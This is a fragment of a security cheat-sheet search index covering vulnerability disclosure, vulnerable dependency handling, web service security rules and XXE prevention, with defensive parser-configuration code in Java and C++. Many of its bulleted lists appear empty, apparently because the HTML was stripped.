The most important step in the process is providing a way for security researchers to contact your organisation. The easier it is for them to do so, the more likely it is that you'll receive security reports. The following list includes some of the common mechanisms that are used for this - the more of these that you can implement the better:

It is also important to ensure that frontline staff (such as those who monitor the main contact address, web chat and phone lines) are aware of how to handle reports of security issues, and who to escalate these reports to within the organisation.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#providing-reporting-guidelines","title":"Providing Reporting Guidelines","text":"

Alongside the contact details, it is also good to provide some guidelines for researchers to follow when reporting vulnerabilities. These could include:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#communicating-with-researchers","title":"Communicating With Researchers","text":"

Communication between researchers and organisations is often one of the hardest points of the vulnerability disclosure process, and can easily leave both sides frustrated and unhappy with the process.

The outline below provides an example of the ideal communication process:

Throughout the process, provide regular updates of the current status, and the expected timeline to triage and fix the vulnerability. Even if there is no firm timeline for these, the ongoing communication provides some reassurance that the vulnerability hasn't been forgotten about.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#researchers-demanding-payment","title":"Researchers Demanding Payment","text":"

Some individuals may approach an organisation claiming to have found a vulnerability, and demanding payment before sharing the details. Although these requests may be legitimate, in many cases they are simply scams.

One option is to request that they carry out the disclosure through a mediated bug bounty platform, which can provide a level of protection for both sides, as scammers are unlikely to be willing to use these platforms.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#disclosure","title":"Disclosure","text":""},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#commercial-and-open-source-software","title":"Commercial and Open Source Software","text":"

Once the vulnerability has been resolved (and retested), the details should be published in a security advisory for the software. It is important to remember that publishing the details of security issues does not make the vendor look bad. All software has security vulnerabilities, and demonstrating a clear and established process for handling and disclosing them gives far more confidence in the security of the software than trying to hide the issues.

At a minimum, the security advisory must contain:

Where possible it is also good to include:

Security advisories should be easy for developers and system administrators to find. Common ways to publish them include:

Some researchers may publish their own technical write ups of the vulnerability, which will usually include the full details required to exploit it (and sometimes even working exploit code). For more serious vulnerabilities, it may be sensible to ask the researcher to delay publishing the full details for a period of time (such as a week), in order to give system administrators more time to install the patches before exploit code is available. However, once the patch has been releases, attackers will be able to reverse engineer the vulnerability and develop their own exploit code, so there is limited value to delaying the full release.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#private-systems","title":"Private Systems","text":"

For vulnerabilities in private systems, a decision needs to be made about whether the details should be published once the vulnerability has been resolved. Most bug bounty programs give organisations the option about whether to disclose the details once the issue has been resolved, although it is not typically required.

Publishing these details helps to demonstrate that the organisation is taking proactive and transparent approach to security, but can also result in potentially embarrassing omissions and misconfigurations being made public. In the event of a future compromise or data breach, they could also potentially be used as evidence of a weak security culture within the organisation. Additionally, they may expose technical details about internal, and could help attackers identify other similar issues. As such, this decision should be carefully evaluated, and it may be wise to take legal advice.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#rewarding-researchers","title":"Rewarding Researchers","text":"

Where researchers have identified and reported vulnerabilities outside of a bug bounty program (essentially providing free security testing), and have acted professionally and helpfully throughout the vulnerability disclosure process, it is good to offer them some kind of reward to encourage this kind of positive interaction in future. If monetary rewards are not possible then a number of other options should be considered, such as:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#further-reading","title":"Further Reading","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html","title":"Vulnerable Dependency Management Cheat Sheet","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The objective of the cheat sheet is to provide a proposal of approach regarding the handling of vulnerable third-party dependencies when they are detected, and this, depending on different situation.

The cheat sheet is not tools oriented but it contains a tools section informing the reader about free and commercial solutions that can be used to detect vulnerable dependencies, depending on the level of support on the technologies at hand

Note:

Proposals mentioned in this cheat sheet are not silver-bullet (recipes that work in all situations) yet can be used as a foundation and adapted to your context.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context","title":"Context","text":"

Most of the projects use third-party dependencies to delegate handling of different kind of operations, e.g. generation of document in a specific format, HTTP communications, data parsing of a specific format, etc.

It's a good approach because it allows the development team to focus on the real application code supporting the expected business feature. The dependency brings forth an expected downside where the security posture of the real application is now resting on it.

This aspect is referenced in the following projects:

Based on this context, it's important for a project to ensure that all the third-party dependencies implemented are clean of any security issue, and if they happen to contain any security issues, the development team needs to be aware of it and apply the required mitigation measures to secure the affected application.

It's highly recommended to perform automated analysis of the dependencies from the birth of the project. Indeed, if this task is added at the middle or end of the project, it can imply a huge amount of work to handle all the issues identified and that will in turn impose a huge burden on the development team and might to blocking the advancement of the project at hand.

Note:

In the rest of the cheat sheet, when we refer to development team then we assume that the team contains a member with the required application security skills or can refer to someone in the company having these kind of skills to analyse the vulnerability impacting the dependency.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#remark-about-the-detection","title":"Remark about the detection","text":"

It's important to keep in mind the different ways in which a security issue is handled after its discovery.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#1-responsible-disclosure","title":"1. Responsible disclosure","text":"

See a description here.

A researcher discovers a vulnerability in a component, and after collaboration with the component provider, they issue a CVE (sometimes a specific vulnerability identifier to the provider is created but generally a CVE identifier is preferred) associated to the issue allowing the public referencing of the issue as well as the available fixation/mitigation.

If in case the provider doesn't properly cooperate with the researcher, the following results are expected:

Here, the vulnerability is always referenced in the CVE global database used, generally, by the detection tools as one of the several input sources used.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#2-full-disclosure","title":"2. Full disclosure","text":"

See a description here, into the section named Computers about Computer Security.

The researcher decides to release all the information including exploitation code/method on services like Full Disclosure mailing list, Exploit-DB.

Here a CVE is not always created then the vulnerability is not always in the CVE global database causing the detection tools to be potentially blind about unless the tools use other input sources.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#remark-about-the-security-issue-handling-decision","title":"Remark about the security issue handling decision","text":"

When a security issue is detected, it's possible to decide to accept the risk represented by the security issue. However, this decision must be taken by the Chief Risk Officer (fallback possible to Chief Information Security Officer) of the company based on technical feedback from the development team that have analyzed the issue (see the Cases section) as well as the CVEs CVSS score indicators.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#cases","title":"Cases","text":"

When a security issue is detected, the development team can meet one of the situations (named Case in the rest of the cheat sheet) presented in the sub sections below.

If the vulnerably impact a transitive dependency then the action will be taken on the direct dependency of the project because acting on a transitive dependency often impact the stability of the application.

Acting on a on a transitive dependency require the development team to fully understand the complete relation/communication/usage from the project first level dependency until the dependency impacted by the security vulnerability, this task is very time consuming.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-1","title":"Case 1","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_1","title":"Context","text":"

Patched version of the component has been released by the provider.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach","title":"Ideal condition of application of the approach","text":"

Set of automated unit or integration or functional or security tests exist for the features of the application using the impacted dependency allowing to validate that the feature is operational.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach","title":"Approach","text":"

Step 1:

Update the version of the dependency in the project on a testing environment.

Step 2:

Prior to running the tests, 2 output paths are possible:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-2","title":"Case 2","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_2","title":"Context","text":"

Provider informs the team that it will take a while to fix the issue and, so, a patched version will not be available before months.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach_1","title":"Ideal condition of application of the approach","text":"

Provider can share any of the below with the development team:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach_1","title":"Approach","text":"

Step 1:

If a workaround is provided, it should be applied and validated on the testing environment, and thereafter deployed to production.

If the provider has given the team a list of the impacted functions, protective code must wrap the calls to these functions to ensure that the input and the output data is safe.

Moreover, security devices, such as the Web Application Firewall (WAF), can handle such issues by protecting the internal applications through parameter validation and by generating detection rules for those specific libraries. Yet, in this cheat sheet, the focus is set on the application level in order to patch the vulnerability as close as possible to the source.

Example using java code in which the impacted function suffers from a Remote Code Execution issue:

public void callFunctionWithRCEIssue(String externalInput){\n//Apply input validation on the external input using regex\nif(Pattern.matches(\"[a-zA-Z0-9]{1,50}\", externalInput)){\n//Call the flawed function using safe input\nfunctionWithRCEIssue(externalInput);\n}else{\n//Log the detection of exploitation\nSecurityLogger.warn(\"Exploitation of the RCE issue XXXXX detected !\");\n//Raise an exception leading to a generic error send to the client...\n}\n}\n

If the provider has provided nothing about the vulnerability, Case 3 can be applied skipping the step 2 of this case. We assume here that, at least, the CVE has been provided.

Step 2:

If the provider has provided the team with the exploitation code, and the team made a security wrapper around the vulnerable library/code, execute the exploitation code in order to ensure that the library is now secure and doesn't affect the application.

If you have a set of automated unit or integration or functional or security tests that exist for the application, run them to verify that the protection code added does not impact the stability of the application.

Add a comment in the project README explaining that the issue (specify the related CVE) is handled during the waiting time of a patched version because the detection tool will continue to raise an alert on this dependency.

Note: You can add the dependency to the ignore list but the ignore scope for this dependency must only cover the CVE related to the vulnerability because a dependency can be impacted by several vulnerabilities having each one its own CVE.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-3","title":"Case 3","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_3","title":"Context","text":"

Provider informs the team that they cannot fix the issue, so no patched version will be released at all (applies also if provider does not want to fix the issue or does not answer at all).

In this case the only information given to the development team is the CVE.

Notes:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach_2","title":"Ideal condition of application of the approach","text":"

Nothing specific because here we are in a patch yourself condition.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach_2","title":"Approach","text":"

Step 1:

If we are in this case due to one of the following conditions, it's a good idea to start a parallel study to find another component better maintained or if it's a commercial component with support then put pressure on the provider with the help of your Chief Risk Officer (fallback possible to Chief Information Security Officer):

In all cases, here, we need to handle the vulnerability right now.

Step 2:

As we know the vulnerable dependency, we know where it is used in the application (if it's a transitive dependency then we can identify the first level dependency using it using the IDE built-in feature or the dependency management system used (Maven, Gradle, NuGet, npm, etc.). Note that IDE is also used to identify the calls to the dependency.

Identifying calls to this dependency is fine but it is the first step. The team still lacks information on what kind of patching needs to be performed.

To obtain these information, the team uses the CVE content to know which kind of vulnerability affects the dependency. The description property provides the answer: SQL injection, Remote Code Execution, Cross-Site Scripting, Cross-Site Request Forgery, etc.

After identifying the above 2 points, the team is aware of the type of patching that needs to be taken (Case 2 with the protective code) and where to add it.

Example:

The team has an application using the Jackson API in a version exposed to the CVE-2016-3720.

The description of the CVE is as follows:

XML external entity (XXE) vulnerability in XmlMapper in the Data format extension for Jackson\n(aka jackson-dataformat-xml) allows attackers to have unspecified impact via unknown vectors.\n

Based on these information, the team determines that the necessary patching will be to add a pre-validation of any XML data passed to the Jakson API to prevent XML external entity (XXE) vulnerability.

Step 3:

If possible, create a unit test that mimics the vulnerability in order to ensure that the patch is effective and have a way to continuously ensure that the patch is in place during the evolution of the project.

If you have a set of automated unit or integration or functional or security tests that exists for the application then run them to verify that the patch does not impact the stability of the application.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#case-4","title":"Case 4","text":""},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#context_4","title":"Context","text":"

The vulnerable dependency is found during one of the following situation in which the provider is not aware of the vulnerability:

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#ideal-condition-of-application-of-the-approach_3","title":"Ideal condition of application of the approach","text":"

Provider collaborates with you after being notified of the vulnerability.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#approach_3","title":"Approach","text":"

Step 1:

Inform the provider about the vulnerability by sharing the post with them.

Step 2:

Using the information from the full disclosure post or the pentester's exploitation feedback, if the provider collaborates then apply Case 2, otherwise apply Case 3, and instead of analyzing the CVE information, the team needs to analyze the information from the full disclosure post/pentester's exploitation feedback.

"},{"location":"cheatsheets/Vulnerable_Dependency_Management_Cheat_Sheet.html#tools","title":"Tools","text":"

This section lists several tools that can used to analyse the dependencies used by a project in order to detect the vulnerabilities.

It's important to ensure, during the selection process of a vulnerable dependency detection tool, that this one:

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html","title":"Web Service Security Cheat Sheet","text":""},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing guidance for securing web services and preventing web services related attacks.

Please notice that due to the difference in implementation between different frameworks, this cheat sheet is kept at a high level.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#transport-confidentiality","title":"Transport Confidentiality","text":"

Transport confidentiality protects against eavesdropping and man-in-the-middle attacks against web service communications to/from the server.

Rule: All communication with and between web services containing sensitive features, an authenticated session, or transfer of sensitive data must be encrypted using well-configured TLS. This is recommended even if the messages themselves are encrypted because TLS provides numerous benefits beyond traffic confidentiality including integrity protection, replay defenses, and server authentication. For more information on how to do this properly see the Transport Layer Protection Cheat Sheet.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#server-authentication","title":"Server Authentication","text":"

Rule: TLS must be used to authenticate the service provider to the service consumer. The service consumer should verify the server certificate is issued by a trusted provider, is not expired, is not revoked, matches the domain name of the service, and that the server has proven that it has the private key associated with the public key certificate (by properly signing something or successfully decrypting something encrypted with the associated public key).

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#user-authentication","title":"User Authentication","text":"

User authentication verifies the identity of the user or the system trying to connect to the service. Such authentication is usually a function of the container of the web service.

Rule: If used, Basic Authentication must be conducted over TLS, but Basic Authentication is not recommended because it discloses secrets in plan text (base64 encoded) in HTTP Headers.

Rule: Client Certificate Authentication using Mutual-TLS is a common form of authentication that is recommended where appropriate. See: Authentication Cheat Sheet.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#transport-encoding","title":"Transport Encoding","text":"

SOAP encoding styles are meant to move data between software objects into XML format and back again.

Rule: Enforce the same encoding style between the client and the server.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-integrity","title":"Message Integrity","text":"

This is for data at rest. The integrity of data in transit can easily be provided by TLS.

When using public key cryptography, encryption does guarantee confidentiality but it does not guarantee integrity since the receiver's public key is public. For the same reason, encryption does not ensure the identity of the sender.

Rule: For XML data, use XML digital signatures to provide message integrity using the sender's private key. This signature can be validated by the recipient using the sender's digital certificate (public key).

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-confidentiality","title":"Message Confidentiality","text":"

Data elements meant to be kept confidential must be encrypted using a strong encryption cipher with an adequate key length to deter brute-forcing.

Rule: Messages containing sensitive data must be encrypted using a strong encryption cipher. This could be transport encryption or message encryption.

Rule: Messages containing sensitive data that must remain encrypted at rest after receipt must be encrypted with strong data encryption, not just transport encryption.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#authorization","title":"Authorization","text":"

Web services need to authorize web service clients the same way web applications authorize users. A web service needs to make sure a web service client is authorized to perform a certain action (coarse-grained) on the requested data (fine-grained).

Rule: A web service should authorize its clients whether they have access to the method in question. Following an authentication challenge, the web service should check the privileges of the requesting entity whether they have access to the requested resource. This should be done on every request, and a challenge-response Authorization mechanism added to sensitive resources like password changes, primary contact details such as email, physical address, payment or delivery instructions.

Rule: Ensure access to administration and management functions within the Web Service Application is limited to web service administrators. Ideally, any administrative capabilities would be in an application that is completely separate from the web services being managed by these capabilities, thus completely separating normal users from these sensitive functions.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#schema-validation","title":"Schema Validation","text":"

Schema validation enforces constraints and syntax defined by the schema.

Rule: Web services must validate SOAP payloads against their associated XML schema definition (XSD).

Rule: The XSD defined for a SOAP web service should, at a minimum, define the maximum length and character set of every parameter allowed to pass into and out of the web service.

Rule: The XSD defined for a SOAP web service should define strong (ideally allow-list) validation patterns for all fixed format parameters (e.g., zip codes, phone numbers, list values, etc.).

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#content-validation","title":"Content Validation","text":"

Rule: Like any web application, web services need to validate input before consuming it. Content validation for XML input should include:

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#output-encoding","title":"Output Encoding","text":"

Web services need to ensure that the output sent to clients is encoded to be consumed as data and not as scripts. This gets pretty important when web service clients use the output to render HTML pages either directly or indirectly using AJAX objects.

Rule: All the rules of output encoding applies as per Cross Site Scripting Prevention Cheat Sheet.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#virus-protection","title":"Virus Protection","text":"

SOAP provides the ability to attach files and documents to SOAP messages. This gives the opportunity for hackers to attach viruses and malware to these SOAP messages.

Rule: Ensure Virus Scanning technology is installed and preferably inline so files and attachments could be checked before being saved on disk.

Rule: Ensure Virus Scanning technology is regularly updated with the latest virus definitions/rules.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-size","title":"Message Size","text":"

Web services like web applications could be a target for DOS attacks by automatically sending the web services thousands of large size SOAP messages. This either cripples the application making it unable to respond to legitimate messages or it could take it down entirely.

Rule: SOAP Messages size should be limited to an appropriate size limit. Larger size limit (or no limit at all) increases the chances of a successful DoS attack.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#availability","title":"Availability","text":""},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#resources-limiting","title":"Resources Limiting","text":"

During regular operation, web services require computational power such as CPU cycles and memory. Due to malfunctioning or while under attack, a web service may required too much resources, leaving the host system unstable.

Rule: Limit the amount of CPU cycles the web service can use based on expected service rate, in order to have a stable system.

Rule: Limit the amount of memory the web service can use to avoid system running out of memory. In some cases the host system may start killing processes to free up memory.

Rule: Limit the number of simultaneous open files, network connections and started processes.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#message-throughput","title":"Message Throughput","text":"

Throughput represents the number of web service requests served during a specific amount of time.

Rule: Configuration should be optimized for maximum message throughput to avoid running into DoS-like situations.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#xml-denial-of-service-protection","title":"XML Denial of Service Protection","text":"

XML Denial of Service is probably the most serious attack against web services. So the web service must provide the following validation:

Rule: Validation against recursive payloads.

Rule: Validation against oversized payloads.

Rule: Protection against XML entity expansion.

Rule: Validating against overlong element names. If you are working with SOAP-based Web Services, the element names are those SOAP Actions.

This protection should be provided by your XML parser/schema validator. To verify, build test cases to make sure your parser to resistant to these types of attacks.

"},{"location":"cheatsheets/Web_Service_Security_Cheat_Sheet.html#endpoint-security-profile","title":"Endpoint Security Profile","text":"

Rule: Web services must be compliant with Web Services-Interoperability (WS-I) Basic Profile at minimum.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html","title":"XML External Entity Prevention Cheat Sheet","text":""},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

XML eXternal Entity injection (XXE), which is now part of the OWASP Top 10 via the point A4, is a type of attack against an application that parses XML input.

XXE issue is referenced under the ID 611 in the Common Weakness Enumeration referential.

This attack occurs when untrusted XML input containing a reference to an external entity is processed by a weakly configured XML parser.

This attack may lead to the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning from the perspective of the machine where the parser is located, and other system impacts. The following guide provides concise information to prevent this vulnerability.

For more information on XXE, please visit XML External Entity (XXE).

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#general-guidance","title":"General Guidance","text":"

The safest way to prevent XXE is always to disable DTDs (External Entities) completely. Depending on the parser, the method should be similar to the following:

factory.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);\n

Disabling DTDs also makes the parser secure against denial of services (DOS) attacks such as Billion Laughs. If it is not possible to disable DTDs completely, then external entities and external document type declarations must be disabled in the way that's specific to each parser.

Detailed XXE Prevention guidance for a number of languages and commonly used XML parsers in those languages is provided below.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#cc","title":"C/C++","text":""},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxml2","title":"libxml2","text":"

The Enum xmlParserOption should not have the following options defined:

Note:

Per: According to this post, starting with libxml2 version 2.9, XXE has been disabled by default as committed by the following patch.

Search for the usage of the following APIs to ensure there is no XML_PARSE_NOENT and XML_PARSE_DTDLOAD defined in the parameters:

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#libxerces-c","title":"libxerces-c","text":"

Use of XercesDOMParser do this to prevent XXE:

XercesDOMParser *parser = new XercesDOMParser;\nparser->setCreateEntityReferenceNodes(true);\nparser->setDisableDefaultEntityResolution(true);\n

Use of SAXParser, do this to prevent XXE:

SAXParser* parser = new SAXParser;\nparser->setDisableDefaultEntityResolution(true);\n

Use of SAX2XMLReader, do this to prevent XXE:

SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();\nparser->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#java","title":"Java","text":"

Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers is to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use. The following describes how to disable XXE in the most commonly used XML parsers for Java.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#jaxp-documentbuilderfactory-saxparserfactory-and-dom4j","title":"JAXP DocumentBuilderFactory, SAXParserFactory and DOM4J","text":"

DocumentBuilderFactory, SAXParserFactory and DOM4J XML Parsers can be configured using the same techniques to protect them against XXE.

Only the DocumentBuilderFactory example is presented here. The JAXP DocumentBuilderFactory setFeature method allows a developer to control which implementation-specific XML processor features are enabled or disabled.

The features can either be set on the factory or the underlying XMLReader setFeature method.

Each XML processor implementation has its own features that govern how DTDs and external entities are processed. By disabling DTD processing entirely, most XXE attacks can be averted, although it is also necessary to disable or verify that XInclude is not enabled.

Since the JDK 6, the flag FEATURE_SECURE_PROCESSING can be used to instruct the implementation of the parser to process XML securely. Its behaviour is implementation dependent. Even if it can help tackling resource exhaustion, it may not always mitigate entity expansion. More details on this flag can be found here.

For a syntax highlighted example code snippet using SAXParserFactory, look here. Example code disabling DTDs (doctypes) altogether:

import javax.xml.parsers.DocumentBuilderFactory;\nimport javax.xml.parsers.ParserConfigurationException; // catching unsupported features\nimport javax.xml.XMLConstants;\n\n...\n\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\nString FEATURE = null;\ntry {\n// This is the PRIMARY defense. If DTDs (doctypes) are disallowed, almost all\n// XML entity attacks are prevented\n// Xerces 2 only - http://xerces.apache.org/xerces2-j/features.html#disallow-doctype-decl\nFEATURE = \"http://apache.org/xml/features/disallow-doctype-decl\";\ndbf.setFeature(FEATURE, true);\n\n// and these as well, per Timothy Morgan's 2014 paper: \"XML Schema, DTD, and Entity Attacks\"\ndbf.setXIncludeAware(false);\n\n// remaining parser logic\n...\n} catch (ParserConfigurationException e) {\n// This should catch a failed setFeature feature\n// NOTE: Each call to setFeature() should be in its own try/catch otherwise subsequent calls will be skipped.\n// This is only important if you're ignoring errors for multi-provider support.\nlogger.info(\"ParserConfigurationException was thrown. The feature '\" + FEATURE\n+ \"' is not supported by your XML processor.\");\n...\n} catch (SAXException e) {\n// On Apache, this should be thrown when disallowing DOCTYPE\nlogger.warning(\"A DOCTYPE was passed into the XML document\");\n...\n} catch (IOException e) {\n// XXE that points to a file that doesn't exist\nlogger.error(\"IOException occurred, XXE may still possible: \" + e.getMessage());\n...\n}\n\n// Load XML file or stream using a XXE agnostic configured parser...\nDocumentBuilder safebuilder = dbf.newDocumentBuilder();\n

If you can't completely disable DTDs:

import javax.xml.parsers.DocumentBuilderFactory;\nimport javax.xml.parsers.ParserConfigurationException; // catching unsupported features\nimport javax.xml.XMLConstants;\n\n...\n\nDocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\nString FEATURE = null;\ntry {    // If you can't completely disable DTDs, then at least do the following:\n// Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-general-entities\n// Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-general-entities\n// JDK7+ - http://xml.org/sax/features/external-general-entities\n//This feature has to be used together with the following one, otherwise it will not protect you from XXE for sure\nFEATURE = \"http://xml.org/sax/features/external-general-entities\";\ndbf.setFeature(FEATURE, false);\n\n// Xerces 1 - http://xerces.apache.org/xerces-j/features.html#external-parameter-entities\n// Xerces 2 - http://xerces.apache.org/xerces2-j/features.html#external-parameter-entities\n// JDK7+ - http://xml.org/sax/features/external-parameter-entities\n//This feature has to be used together with the previous one, otherwise it will not protect you from XXE for sure\nFEATURE = \"http://xml.org/sax/features/external-parameter-entities\";\ndbf.setFeature(FEATURE, false);\n\n// Disable external DTDs as well\nFEATURE = \"http://apache.org/xml/features/nonvalidating/load-external-dtd\";\ndbf.setFeature(FEATURE, false);\n\n// and these as well, per Timothy Morgan's 2014 paper: \"XML Schema, DTD, and Entity Attacks\"\ndbf.setXIncludeAware(false);\ndbf.setExpandEntityReferences(false);\n\n// As stated in the documentation \"Feature for Secure Processing (FSP)\" is the central mechanism to \n// help safeguard XML processing. It instructs XML processors, such as parsers, validators, \n// and transformers, to try and process XML securely. This can be used as an alternative to\n// dbf.setExpandEntityReferences(false); to allow some safe level of Entity Expansion\n// Exists from JDK6.\ndbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);\n\n\n// And, per Timothy Morgan: \"If for some reason support for inline DOCTYPEs are a requirement, then\n// ensure the entity settings are disabled (as shown above) and beware that SSRF attacks\n// (http://cwe.mitre.org/data/definitions/918.html) and denial\n// of service attacks (such as billion laughs or decompression bombs via \"jar:\") are a risk.\"\n\n// remaining parser logic\n...\n} catch (ParserConfigurationException e) {\n// This should catch a failed setFeature feature\n// NOTE: Each call to setFeature() should be in its own try/catch otherwise subsequent calls will be skipped.\n// This is only important if you're ignoring errors for multi-provider support.\nlogger.info(\"ParserConfigurationException was thrown. The feature '\" + FEATURE\n+ \"' is probably not supported by your XML processor.\");\n...\n} catch (SAXException e) {\n// On Apache, this should be thrown when disallowing DOCTYPE\nlogger.warning(\"A DOCTYPE was passed into the XML document\");\n...\n} catch (IOException e) {\n// XXE that points to a file that doesn't exist\nlogger.error(\"IOException occurred, XXE may still possible: \" + e.getMessage());\n...\n}\n\n// Load XML file or stream using a XXE agnostic configured parser...\nDocumentBuilder safebuilder = dbf.newDocumentBuilder();\n

Xerces 1 Features:

Xerces 2 Features:

Note: The above defenses require Java 7 update 67, Java 8 update 20, or above, because the above countermeasures for DocumentBuilderFactory and SAXParserFactory are broken in earlier Java versions, per: CVE-2014-6517.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xmlinputfactory-a-stax-parser","title":"XMLInputFactory (a StAX parser)","text":"

StAX parsers such as XMLInputFactory allow various properties and features to be set.

To protect a Java XMLInputFactory from XXE, disable DTDs (doctypes) altogether:

// This disables DTDs entirely for that factory\nxmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);\n

or if you can't completely disable DTDs:

// This causes XMLStreamException to be thrown if external DTDs are accessed.\nxmlInputFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\n// disable external entities\nxmlInputFactory.setProperty(\"javax.xml.stream.isSupportingExternalEntities\", false);\n

The setting xmlInputFactory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\"); is not required, as XMLInputFactory is dependent on Validator to perform XML validation against Schemas. Check the Validator section for the specific configuration.

"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#oracle-dom-parser","title":"Oracle DOM Parser","text":"

Follow Oracle recommendation e.g.:

    // Extend oracle.xml.parser.v2.XMLParser\nDOMParser domParser = new DOMParser();\n\n// Do not expand entity references\ndomParser.setAttribute(DOMParser.EXPAND_ENTITYREF, false);\n\n// dtdObj is an instance of oracle.xml.parser.v2.DTD\ndomParser.setAttribute(DOMParser.DTD_OBJECT, dtdObj);\n\n// Do not allow more than 11 levels of entity expansion\ndomParser.setAttribute(DOMParser.ENTITY_EXPANSION_DEPTH, 12);\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory","title":"TransformerFactory","text":"

To protect a javax.xml.transform.TransformerFactory from XXE, do this:

TransformerFactory tf = TransformerFactory.newInstance();\ntf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\ntf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, \"\");\n
"},{"location":"cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#validator","title":"Validator","text":"

To protect a javax.xml.validation.Validator from XXE, do this:

SchemaFactory factory = SchemaFactory.newInstance(\"http://www.w3.org/2001/XMLSchema\");\nSchema schema = factory.newSchema();\nValidator validator = schema.newValidator();\nvalidator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\");\nvalidator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\");\n
